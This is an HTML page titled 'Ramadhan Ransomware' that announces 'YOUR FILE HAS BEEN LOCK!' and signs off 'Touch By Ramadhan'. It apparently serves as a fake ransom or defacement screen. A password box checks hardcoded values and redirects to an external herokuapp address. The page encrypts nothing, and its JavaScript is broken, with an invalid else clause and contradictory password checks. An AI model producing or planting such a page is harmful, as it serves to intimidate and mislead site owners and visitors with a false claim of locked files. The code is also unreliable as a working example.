<!DOCTYPE html>
<html lang="en">

  <head>
<title>Ramadhan Ransomware</title>
<link rel="shortcut icon" href="https://e.top4top.io/p_1759p3pm30.png">
<link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet" type="text/css">
<link href="http://fonts.googleapis.com/css?family=Indie+Flower" rel="stylesheet" type="text/css">
<link href="https://fonts.googleapis.com/css?family=Share+Tech+Mono" rel="stylesheet" type="text/css">
<script>
    function login()
	{
		var pwd = document.getElementById("pwd").value;
		var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
        if(pwd == null)
		{
        	alert("enter the password");
		}
		else if(pwd !== 'ItsmeHndrr')
		{
			alert("Password salah!");
		}
		else (pwd == 'qwertr12') {
	    //alert('Otw login');
        window.location.href='https://mrg3p5-api.herokuapp.com/api'
	    }
	}
	//Reset Inputfield code.
	function clearFunc()
	{
		document.getElementById("pwd").value="";
	}	
</script>
<style> 
    html { 
    background: black; 
    color: white; 
} 
    input { 
        background: transparent; 
        color: white; 
        border: 1px solid white; 
        }
h1 {
    color: white;
    text-shadow:1px 1px 50px aqua;
 	font-weight: bold;
 	font-family: Kelly Slab;
}
h2 {
    color: white;
    text-shadow:1px 1px 25px aqua;
 	font-weight: bold;
 	font-family: Indie Flower;
}
h3 {
    color: white;
    text-shadow:1px 1px 25px aqua;
 	font-weight: bold;
 	font-family: Share Tech Mono;
}
h4 {
    color: white;
    text-shadow:1px 1px 28px aqua;
 	font-weight: bold;
 	font-family: Indie Flower;
}
</style> 
</head>
<body>
    <center>
    <h1>YOUR FILE HAS BEEN LOCK!</h1><br>
    <img height="200" src="https://e.top4top.io/p_1759p3pm30.png"/><br>
    <h2>Touch By Ramadhan</h2>
    <h3>MESSAGE:</h3>
    <h4>Pesanku hanyalah jangan menjadi pelangi bagi seseorang yang buta WARNA :)</h4><br>
    </p>
    <form enctype="multipart/form-data" method="post"> Password Encrypt
        <input type="text" placeholder="No Password REQUIRE" id="pwd" class="tb"/><br>
        <input type="submit" value="Login" class="btn" onClick="login()" />
       </center>
    </body>>
</html>
